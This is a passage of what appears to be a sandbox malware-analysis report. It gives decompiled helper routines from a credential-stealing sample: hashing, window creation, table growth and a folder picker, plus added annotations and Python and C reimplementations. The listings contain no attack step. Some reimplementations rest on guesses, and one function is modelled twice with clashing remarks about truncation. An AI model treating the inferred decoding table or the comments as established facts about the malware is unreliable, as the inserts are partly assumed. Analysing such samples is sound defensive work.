                                                                                                                                                                        • String ID: >$>$>
                                                                                                                                                                        • API String ID: 39653677-3911187716
                                                                                                                                                                        • Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                                                                                                                                                                        • Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
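The listing above is the inner loop of a base64-style decoder: four input symbols become three output bytes, '.' (0x2e) is mapped straight to 62 (0x3e) instead of going through the lookup routine E004114FF, and '-' (0x2d) ends the input where standard base64 would carry '=' padding. The Python below is an added example for decoding such strings offline; it is not code from the sample or from this report. It takes '.' for 62 and the '-' terminator from the listing, and assumes the standard A-Z, a-z, 0-9 order for values 0 to 61 and '_' for 63, since E004114FF is not shown here. How the sample treats '-' in the first two positions of a group is also outside the excerpt; the example treats it as end of input.

```python
import base64

# Symbol-to-value table. Values 0..61 in the standard A-Z, a-z, 0-9 order are an
# assumption (the sample's lookup routine E004114FF is not in the excerpt);
# '.' -> 62 is taken from the listing; '_' -> 63 is a placeholder assumption.
_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._"
_VALUE = {ch: i for i, ch in enumerate(_ALPHABET)}
TERMINATOR = "-"   # 0x2d in the listing, used where standard base64 has '='
MAX_OUT = 0x3FF    # the listing stops once its output index nears 0x3ff


def decode_custom_b64(text: str) -> bytes:
    """Four symbols -> three bytes; '-' ends the input early (1 or 2 bytes from the last group)."""
    out = bytearray()
    i = 0
    while i + 1 < len(text) and len(out) + 5 < MAX_OUT:   # approximates the 0x3ff bound
        s0, s1 = text[i], text[i + 1]
        if s0 == TERMINATOR or s1 == TERMINATOR:
            break   # assumption: '-' in positions 1-2 is simply end of input
        v0, v1 = _VALUE[s0], _VALUE[s1]
        out.append(((v0 << 2) | (v1 >> 4)) & 0xFF)     # _v6 << 2 | _v5 >> 4
        if i + 2 >= len(text) or text[i + 2] == TERMINATOR:
            break                                      # the `== 0x2d` break: one byte
        v2 = _VALUE[text[i + 2]]
        out.append(((v1 << 4) | (v2 >> 2)) & 0xFF)     # _v5 << 4 | _t57 >> 2
        if i + 3 >= len(text) or text[i + 3] == TERMINATOR:
            break                                      # the `return _t69 + 2` path: two bytes
        v3 = _VALUE[text[i + 3]]
        out.append(((v2 << 6) | v3) & 0xFF)            # _t57 << 6 | _v7
        i += 4
    return bytes(out)


def encode_custom_b64(data: bytes) -> str:
    """Inverse of decode_custom_b64, useful for building test strings and round-trip checks."""
    std = base64.b64encode(data).decode("ascii")
    body = std.rstrip("=").translate(str.maketrans("+/", "._"))
    return body + (TERMINATOR if len(body) != len(std) else "")


if __name__ == "__main__":
    # Constructed inputs: "hello" and a pair of bytes that exercise the '.' symbol.
    print(decode_custom_b64("aGVsbG8-"))
    print(encode_custom_b64(b"\xfb\xff"))
```

If strings recovered from the sample's memory decode to garbage with this table, the 0..61 ordering or the 63rd symbol is where to look first; the group arithmetic and the '-' handling are fixed by the listing.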

                                                                                                                                                                        C-Code - Quality: 50%
			E0040BE4E(signed int __eax, void* __ecx, void* _a4) {
				// Hash-update routine: __eax = input length, __ecx = context, _a4 = input data.
				// Offsets used: +0x10/+0x14 = 64-bit bit count (low/high dword), +0x18 = 64-byte block
				// buffer; E0040BF6B(buffer, ctx) compresses one block. The 16 bytes below the count
				// would hold a four-dword state, consistent with an MD4/MD5-style context.
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;                                              // ctx
				_t34 = __eax;                                              // remaining input length
				_t23 =  *(__ecx + 0x10);                                   // old bit count, low dword
				_t36 = _t23 + __eax * 8;                                   // add len * 8 bits
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {                                          // unsigned overflow: carry into the high dword
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);   // high bits of len * 8
				_t25 = _t23 >> 0x00000003 & 0x0000003f;                    // bytes already pending in the block buffer
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {                                     // whole 64-byte blocks: copy into the buffer, compress
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BF6B(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);                                           // remaining tail (< 64 bytes) is buffered at offset 0
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;                                    // bytes needed to complete the pending block
					_t40 = _t48 + 0x18 + _t25;                             // write position inside the buffer
					if(_t34 >= _t47) {                                     // enough input: complete it, compress, continue at L6
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BF6B(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {                                               // not enough: just append to the pending block
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();                                           // memcpy(dst, src, len) with the three arguments pushed above
			}
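The routine above has the shape of the Update function of a Merkle-Damgard hash: a 64-bit bit count at +0x10/+0x14 with an explicit carry, input buffered into a 64-byte block at +0x18, and E0040BF6B called on every full block. The 16-byte gap below the count would hold a four-dword state, which is the MD4/MD5 context layout of RFC 1321. The Python below is an added example, not code from the sample: it keeps that context layout and reproduces the update logic step for step (index = (count_lo >> 3) & 0x3F, partLen = 64 - index, block loop, tail copy) and checks the result against known MD5 vectors. The compression function is the RFC 1321 MD5 transform, which is an assumption here because E0040BF6B is not in this excerpt; to confirm the sample's algorithm, compare the round constants in E0040BF6B against the K table below.

```python
import math
import struct

MASK32 = 0xFFFFFFFF
# Per-round left-rotation amounts and sine-derived constants from RFC 1321 (assumed to be
# what E0040BF6B implements; the sample's transform is not shown on this page).
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK32 for i in range(64)]


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


class Md5Ctx:
    """Same field order as the offsets in the listing."""

    def __init__(self):
        self.state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]  # +0x00..+0x0F (inferred)
        self.count_lo = 0            # +0x10: bit count, low dword
        self.count_hi = 0            # +0x14: bit count, high dword
        self.buffer = bytearray(64)  # +0x18: pending block


def transform(block, ctx):
    """RFC 1321 compression of one 64-byte block (the role of E0040BF6B)."""
    a, b, c, d = ctx.state
    x = struct.unpack("<16I", bytes(block))
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + x[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, S[i])) & MASK32
    ctx.state = [(s + v) & MASK32 for s, v in zip(ctx.state, (a, b, c, d))]


def update(ctx, data):
    """Mirrors E0040BE4E: count bookkeeping, complete the pending block, whole blocks, tail."""
    n = len(data)
    old = ctx.count_lo
    ctx.count_lo = (old + n * 8) & MASK32
    if ctx.count_lo < old:                                 # the `if(_t36 < _t23)` carry
        ctx.count_hi = (ctx.count_hi + 1) & MASK32
    ctx.count_hi = (ctx.count_hi + (n >> 29)) & MASK32     # the `_t34 >> 0x1d` term
    index = (old >> 3) & 0x3F                              # `_t23 >> 3 & 0x3f`
    pos = 0
    if index:
        part = 64 - index                                  # `_t47`
        if n < part:                                       # not enough to complete the block
            ctx.buffer[index:index + n] = data
            return
        ctx.buffer[index:64] = data[:part]
        transform(ctx.buffer, ctx)
        pos, n = part, n - part                            # then fall through to L6
    while n >= 64:                                         # the do/while over `_t34 >> 6` blocks
        ctx.buffer[:] = data[pos:pos + 64]
        transform(ctx.buffer, ctx)
        pos += 64
        n -= 64
    ctx.buffer[:n] = data[pos:pos + n]                     # final memcpy(ctx + 0x18, data, n)


def final(ctx):
    bits = struct.pack("<II", ctx.count_lo, ctx.count_hi)  # length must be captured before padding
    index = (ctx.count_lo >> 3) & 0x3F
    pad_len = 56 - index if index < 56 else 120 - index
    update(ctx, b"\x80" + b"\x00" * (pad_len - 1))
    update(ctx, bits)
    return struct.pack("<4I", *ctx.state)


def md5_hex(data, chunk_sizes=None):
    """Hash `data`; optional chunk sizes feed it piecewise to exercise the buffering paths."""
    ctx = Md5Ctx()
    if chunk_sizes is None:
        update(ctx, data)
    else:
        pos = 0
        for size in chunk_sizes:
            update(ctx, data[pos:pos + size])
            pos += size
        update(ctx, data[pos:])
    return final(ctx).hex()


if __name__ == "__main__":
    sample = bytes(range(256)) * 3   # constructed input crossing several block boundaries
    print(md5_hex(b"abc"), md5_hex(sample, [1, 63, 64, 65, 7]) == md5_hex(sample))
```

The chunked call is the useful check: feeding the same bytes as 1, 63, 64, 65 and 7-byte pieces exercises the "complete the pending block", "whole blocks" and "tail only" branches of the update routine, and the digest must not change.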













(Per-line instruction address column of the listing above, collapsed: 0x0040be53 to 0x0040beeb in the memory dump at image base 0x00400000.)

Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
• Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
• Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
• Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040B84C(void* __ecx, void* _a4) {
                                                                                                                                                                        				struct _WNDCLASSA _v44;
                                                                                                                                                                        				void _v299;
                                                                                                                                                                        				char _v300;
                                                                                                                                                                        				void _v555;
                                                                                                                                                                        				char _v556;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				struct HINSTANCE__* _t27;
                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                        				void* _t36;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t36 = __ecx;
                                                                                                                                                                        				_v556 = 0;
                                                                                                                                                                        				memset( &_v555, 0, 0xff);
                                                                                                                                                                        				_v300 = 0;
                                                                                                                                                                        				memset( &_v299, 0, 0xff);
                                                                                                                                                                        				_t27 =  *0x417b94; // 0x400000
                                                                                                                                                                        				_t41 = _a4;
                                                                                                                                                                        				_v44.hInstance = _t27;
                                                                                                                                                                        				_v44.hIcon =  *((intOrPtr*)(_t41 + 0x104));
                                                                                                                                                                        				_v44.lpszClassName = _t41 + 4;
                                                                                                                                                                        				_v44.style = 0;
                                                                                                                                                                        				_v44.lpfnWndProc = E0040174E;
                                                                                                                                                                        				_v44.cbClsExtra = 0;
                                                                                                                                                                        				_v44.cbWndExtra = 0;
                                                                                                                                                                        				_v44.hCursor = 0;
                                                                                                                                                                        				_v44.hbrBackground = 0x10;
                                                                                                                                                                        				_v44.lpszMenuName = 0;
                                                                                                                                                                        				RegisterClassA( &_v44);
                                                                                                                                                                        				_t32 = E004019DA(_t36,  &_v300, 0x413450);
                                                                                                                                                                        				_t34 = CreateWindowExA(0, E004019DA(_t36,  &_v556, 0x414478), _t32, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x417b94, _t41);
                                                                                                                                                                        				 *(_a4 + 0x108) = _t34;
                                                                                                                                                                        				return _t34;
                                                                                                                                                                        			}















(Per-line instruction address column of the listing above, collapsed: 0x0040b84c to 0x0040b91b, i.e. the function starts at its name E0040B84C.)

Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: memset$ClassCreateRegisterWindowstrncat
• String ID:
• API String ID: 3664037073-0
• Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
• Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
• Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
• Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4
Uniqueness
• Uniqueness Score: -1.00%
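The next listing on this page, E004070D9, is the growth path of a small table of 8-byte entries. On its `if(_t51 <= 0)` path (label L4) it adds the table's growth step (the third dword at esi) to the current entry count, multiplies the new count by 8 with a guard that the decompiler renders as `~(0 | carry) | product` (this reads as the compiler-generated overflow check on an allocation size: if the multiply overflows, the size passed to the allocator is forced to all-ones so the request fails instead of returning a short buffer), zero-fills the new block, copies the old entries into it, releases the old block, and stores the two arguments `_a4` and `_a8` at the first newly created slot. The portable C below is an added example written for this page, not code from the report or from the sample, and it is placed here because the report's listing of that function is truncated. It models only that L4 path; the struct layout and field names are inferred from the esi-relative accesses, treating L00412090 and L00412096 as the allocator and its matching release routine is an inference, and the guard on the count addition is an extra check the sample does not have.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* One 8-byte table entry: the two 32-bit values E004070D9 stores at
 * new_buffer + old_count*8 (+0 and +4), i.e. its _a4 and _a8 arguments.
 * An all-zero entry is an unused slot, which is why the sample zero-fills
 * the whole new buffer before copying the old entries in. (Layout inferred
 * from the decompiled accesses; the field names are this example's.) */
typedef struct { uint32_t first; uint32_t second; } entry_t;

/* Table header inferred from the esi-relative accesses in the listing:
 * esi[0] = buffer, esi[1] = entry count, esi[2] = growth step. */
typedef struct {
    entry_t *data;
    size_t   count;
    size_t   grow;
} entry_table_t;

/* Saturating size multiply: the decompiler's "~(0 | carry) | product"
 * expression. If n * elem_size overflows, return SIZE_MAX so that the
 * allocator refuses the request instead of returning a buffer that is
 * too small for the memset/memcpy that follow. The sample is 32-bit, so
 * its saturation value is 0xFFFFFFFF. */
static size_t alloc_size_saturating(size_t n, size_t elem_size) {
    if (n != 0 && elem_size > SIZE_MAX / n)
        return SIZE_MAX;
    return n * elem_size;
}

/* Readable equivalent of the L4 path of E004070D9: enlarge the table by
 * `grow` entries, zero the new block, carry the old entries over, release
 * the old block, then store (a, b) in the first newly created slot.
 * Returns 0 on success and -1 when the allocation is refused. */
int entry_table_grow_and_store(entry_table_t *t, uint32_t a, uint32_t b) {
    size_t old_count = t->count;
    size_t new_count = old_count + t->grow;

    /* Added guard: the sample checks only the multiply, not this addition. */
    if (new_count < old_count)
        return -1;

    size_t bytes = alloc_size_saturating(new_count, sizeof(entry_t));
    if (bytes == SIZE_MAX)
        return -1;                      /* the sample hands this size to the allocator and lets it fail */

    entry_t *fresh = malloc(bytes);     /* L00412090 in the listing (inferred to be an allocator) */
    if (fresh == NULL)
        return -1;                      /* the sample has no NULL check: it memsets the result directly */

    memset(fresh, 0, bytes);            /* memset(new, 0, new_count << 3) */
    if (old_count != 0)                 /* the sample calls memcpy unconditionally, even with a NULL source */
        memcpy(fresh, t->data, old_count * sizeof(entry_t));
    if (t->data != NULL)
        free(t->data);                  /* L00412096 in the listing (inferred to be the matching release) */

    t->data  = fresh;
    t->count = new_count;               /* the sample stores the new count before allocating */
    fresh[old_count].first  = a;        /* *(buffer + old_count*8)     = _a4 */
    fresh[old_count].second = b;        /* *(buffer + old_count*8 + 4) = _a8 */
    return 0;
}

int main(void) {
    entry_table_t t = { NULL, 0, 4 };   /* constructed: empty table growing four entries at a time */
    entry_table_grow_and_store(&t, 0x11, 0x22);
    entry_table_grow_and_store(&t, 0x33, 0x44);
    printf("count=%zu [0]=%#x/%#x [4]=%#x/%#x\n", t.count,
           t.data[0].first, t.data[0].second, t.data[4].first, t.data[4].second);
    /* A size that overflows size_t is refused instead of under-allocated. */
    printf("saturated=%d\n", alloc_size_saturating(SIZE_MAX / 2, sizeof(entry_t)) == SIZE_MAX);
    free(t.data);
    return 0;
}
```

Each call through the L4 path grows the table by the full step and leaves the slots after the stored entry zeroed; the `count > 0` branch of the sample, which presumably handles the case where the table already has entries, is not on this page and is not modelled.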

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E004070D9(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				int _t52;
                                                                                                                                                                        				void** _t53;
                                                                                                                                                                        				void* _t58;
                                                                                                                                                                        
                                                                                                                                                                        				_t53 = __esi;
                                                                                                                                                                        				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                                        				_t51 =  *_t1;
                                                                                                                                                                        				_t21 = 0;
                                                                                                                                                                        				if(_t51 <= 0) {
                                                                                                                                                                        					L4:
/* addresses of the preceding lines of this function (not shown in this excerpt): 0x004070d9 0x004070da 0x004070da 0x004070dd 0x004070e1 0x004070f4 */
/* __esi / _t53 appears to be the same table object: { entry array, capacity, growth step }; entries are 8-byte (key, value) pairs and a zero key marks a free slot */
/* 0x004070f4 */					_t2 =  &(_t53[2]); // 0x8  -> growth step (slots added on each grow)
/* 0x004070f8 */					_t33 =  *_t53;   // old entry array
/* 0x004070fa */					_t23 =  *_t2 + _t51;   // new capacity = old capacity (_t51) + growth step
/* 0x00407100 */					_t46 = 8;   // entry size in bytes
/* 0x00407101 */					_t53[1] = _t23;   // store the new capacity
/* 0x00407104 */					_t24 = _t23 * _t46;   // byte size of the new array
/* 0x0040710d */					_push( ~(0 | _t58 > 0x00000000) | _t24);   // decompiler rendering of the multiply-overflow saturation applied to the size before the allocation
/* 0x0040710e */					L00412090();   // allocator; the API ID below lists ??2@ (operator new). The result is not checked before use
/* 0x00407113 */					_t10 =  &(_t53[1]); // 0x0
/* 0x0040711d */					 *_t53 = _t24;   // table now points at the new array
/* 0x0040711f */					memset(_t24, 0,  *_t10 << 3);   // zero the whole new array (capacity * 8)
/* 0x00407124 */					_t52 = _t51 << 3;   // old capacity * 8
/* 0x0040712b */					memcpy( *_t53, _t33, _t52);   // copy the old entries over
/* 0x00407135 */					if(_t33 != 0) {
/* 0x00407137 */						_push(_t33);
/* 0x00407138 */						L00412096();   // release the old array; the API ID below lists ??3@ (operator delete)
/* 0x0040713d */					}
/* 0x00407144 */					 *((intOrPtr*)( *_t53 + _t52)) = _a4;   // new key goes into the first added slot (index = old capacity) ...
/* 0x0040714d */					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;   // ... and its value right after it
/* 0x004070e3 */				} else {
/* 0x004070e3 */					_t44 =  *__esi;   // entry array; scan it for a free slot
/* 0x004070e5 */					_t48 = _t44;
/* 0x004070e7 */					while( *_t48 != 0) {   // stop at the first entry whose key is 0
/* 0x004070ec */						_t21 = _t21 + 1;   // index++
/* 0x004070ed */						_t48 = _t48 + 8;   // next 8-byte entry
/* 0x004070f0 */						_t58 = _t21 - _t51;   // index versus capacity
/* 0x004070f2 */						if(_t58 < 0) {
/* 0x00000000 */							continue;   // still inside the array: keep scanning
/* 0x00000000 */						} else {
/* 0x00000000 */							goto L4;   // table full; L4 is outside this excerpt
/* 0x00000000 */						}
/* 0x00000000 */						goto L7;
/* 0x004070f2 */					}
/* 0x0040715d */					_t31 = _t21 << 3;   // byte offset of the free slot
/* 0x00407160 */					 *((intOrPtr*)(_t44 + _t31)) = _a4;   // key
/* 0x00407169 */					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;   // value
/* 0x00407169 */				}
/* 0x00407152 */				L7:
/* 0x00407156 */				return 1;   // always reports success
			}
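The append routine above is easier to reason about as a clean reimplementation. The C below is added illustrative code for this write-up, not code recovered from the sample: the struct layout (entry array, capacity, growth step), the 8-byte (key, value) entry and the convention that a zero key marks a free slot are inferred from the decompiler output and are assumptions. Unlike the decompiled code, it checks the size computation and the allocation result explicitly, and its self-test exercises both the free-slot path and the grow path on constructed input.

```c
/* Readable reimplementation of the growable (key, value) table that the decompiled
 * function above appears to append into.  Added illustrative code for this page,
 * not code recovered from the sample; field layout, "key == 0 means free slot" and
 * the growth step are inferred from the decompiler output (assumptions). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    uint32_t key;              /* _a4: stored at data + idx*8     */
    uint32_t value;            /* _a8: stored at data + idx*8 + 4 */
} pair_t;

typedef struct {
    pair_t *data;              /* *_t53   (offset 0): entry array          */
    size_t  capacity;          /* _t53[1] (offset 4): slots allocated      */
    size_t  grow_by;           /* _t53[2] (offset 8): slots added per grow */
} pair_table_t;

void pair_table_init(pair_table_t *t, size_t grow_by) {
    t->data = NULL;
    t->capacity = 0;
    t->grow_by = grow_by;
}

void pair_table_free(pair_table_t *t) {
    free(t->data);
    t->data = NULL;
    t->capacity = 0;
}

/* Mirrors the sample's two paths: reuse the first free slot (the else branch),
 * otherwise allocate capacity + grow_by zeroed slots, copy the old entries,
 * release the old block and store the new pair at index old_capacity.
 * Returns 1 on success, 0 on a rejected key, size overflow or allocation failure. */
int pair_table_put(pair_table_t *t, uint32_t key, uint32_t value) {
    if (key == 0)
        return 0;              /* 0 is the free-slot marker; storing it would break the scan */
    for (size_t i = 0; i < t->capacity; i++) {
        if (t->data[i].key == 0) {
            t->data[i].key = key;
            t->data[i].value = value;
            return 1;
        }
    }
    size_t new_cap = t->capacity + t->grow_by;
    /* Explicit overflow check.  The sample saturates the byte size before the
     * allocator call but shows no NULL check on the result before its memset. */
    if (new_cap < t->capacity || new_cap > SIZE_MAX / sizeof(pair_t))
        return 0;
    pair_t *fresh = calloc(new_cap, sizeof(pair_t));   /* allocate + memset(0) */
    if (fresh == NULL)
        return 0;
    if (t->data != NULL) {                             /* the sample's if(_t33 != 0) */
        memcpy(fresh, t->data, t->capacity * sizeof(pair_t));
        free(t->data);
    }
    fresh[t->capacity].key = key;
    fresh[t->capacity].value = value;
    t->data = fresh;
    t->capacity = new_cap;
    return 1;
}

/* Linear lookup; returns 1 and writes *value when key is present. */
int pair_table_get(const pair_table_t *t, uint32_t key, uint32_t *value) {
    for (size_t i = 0; i < t->capacity; i++) {
        if (t->data[i].key == key) {
            *value = t->data[i].value;
            return 1;
        }
    }
    return 0;
}

/* Exercises both paths on constructed input; returns 0 when every step behaves
 * as expected, otherwise the number of the first failing step. */
int pair_table_selftest(void) {
    pair_table_t t;
    uint32_t v = 0;
    pair_table_init(&t, 2);
    if (!pair_table_put(&t, 1, 100) || t.capacity != 2) return 1;  /* grow 0 -> 2 */
    if (!pair_table_put(&t, 2, 200) || t.capacity != 2) return 2;  /* free slot [1] */
    if (!pair_table_put(&t, 3, 300) || t.capacity != 4) return 3;  /* grow 2 -> 4 */
    if (!pair_table_get(&t, 2, &v) || v != 200) return 4;          /* survived the copy */
    if (pair_table_put(&t, 0, 5) != 0) return 5;                   /* key 0 rejected */
    if (!pair_table_put(&t, 4, 400) || t.capacity != 4) return 6;  /* last free slot */
    t.grow_by = SIZE_MAX;                                          /* force size overflow */
    if (pair_table_put(&t, 5, 500) != 0 || t.capacity != 4) return 7;
    pair_table_free(&t);
    return 0;
}

int main(void) {
    printf("pair_table selftest: %d\n", pair_table_selftest());
    return 0;
}
```

The self-test returns 0 when the table grows 0 to 2 to 4 slots, reuses free slots before growing, rejects a zero key, and refuses a size computation that would wrap; the decompiled routine has no equivalent of the last two checks and always returns 1.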

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
• Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
• Opcode Fuzzy Hash: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
• Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
			/* Standard Win32 "browse for folder" wrapper: shows the shell folder picker and copies the chosen path into the caller's buffer. A GUI helper; the credential-harvesting logic flagged for this sample lives elsewhere. */
			E0040F61F(char* __esi, char _a4, intOrPtr _a8) {   // __esi: output path buffer, _a4: owner window, _a8: dialog title
				void* _v8;        // IMalloc* from SHGetMalloc
				char* _v16;       // BROWSEINFOA.lParam
				intOrPtr _v20;    // BROWSEINFOA.lpfn
				intOrPtr _v24;    // BROWSEINFOA.ulFlags
				intOrPtr _v28;    // BROWSEINFOA.lpszTitle
				intOrPtr _v32;    // BROWSEINFOA.pszDisplayName
				intOrPtr _v36;    // BROWSEINFOA.pidlRoot
				char _v40;        // BROWSEINFOA.hwndOwner (start of the struct; iImage at -12 is left unset)
				char _v304;       // 264-byte path buffer (MAX_PATH + 4)
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

/* 0x0040f629 */				_t18 =  &_v8;
/* 0x0040f62d */				_t30 = 0;   // result: 0 until a path has been copied
/* 0x0040f62f */				__imp__SHGetMalloc(_t18);   // HRESULT in _t18
/* 0x0040f637 */				if(_t18 >= 0) {   // SUCCEEDED(hr)
/* 0x0040f63c */					_v40 = _a4;   // hwndOwner
/* 0x0040f642 */					_v28 = _a8;   // lpszTitle
/* 0x0040f646 */					_t22 =  &_v40;
/* 0x0040f64a */					_v36 = 0;   // pidlRoot: browse from the desktop
/* 0x0040f64d */					_v32 = 0;   // pszDisplayName: not wanted
/* 0x0040f650 */					_v24 = 4;   // ulFlags = BIF_STATUSTEXT (0x0004)
/* 0x0040f657 */					_v20 = E0040F5A7;   // lpfn: browse callback
/* 0x0040f65e */					_v16 = __esi;   // lParam: the caller's buffer is handed to the callback
/* 0x0040f661 */					__imp__SHBrowseForFolderA(_t22, _t35);   // takes one argument (the BROWSEINFOA*); _t35 is a decompiler artifact. Returns the selected PIDL in eax
/* 0x0040f667 */					_t36 = _t22;   // PIDL (decompiler reuses _t22 for the return value)
/* 0x0040f66b */					if(_t36 != 0) {   // user picked a folder rather than cancelling
/* 0x0040f66d */						_t23 =  &_v304;
/* 0x0040f675 */						__imp__SHGetPathFromIDListA(_t36, _t23);   // PIDL -> file system path, BOOL in _t23
/* 0x0040f67d */						if(_t23 != 0) {
/* 0x0040f687 */							_t30 = 1;
/* 0x0040f688 */							strcpy(__esi,  &_v304);   // unbounded copy into the caller's buffer; the source is limited only by the 264-byte local
/* 0x0040f68e */						}
/* 0x0040f68f */						_t24 = _v8;
/* 0x0040f696 */						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);   // IMalloc::Free(pidl) (vtable slot 5, offset 0x14)
/* 0x0040f699 */						_t26 = _v8;
/* 0x0040f69f */						 *((intOrPtr*)( *_t26 + 8))(_t26);   // IMalloc::Release() (vtable slot 2, offset 8)
/* 0x0040f69f */					}
/* 0x0040f6a2 */				}
/* 0x0040f6a7 */				return _t30;   // 1 if a path was written to __esi
			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 0040F62F
                                                                                                                                                                        • SHBrowseForFolderA.SHELL32(?), ref: 0040F661
                                                                                                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 0040F688
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
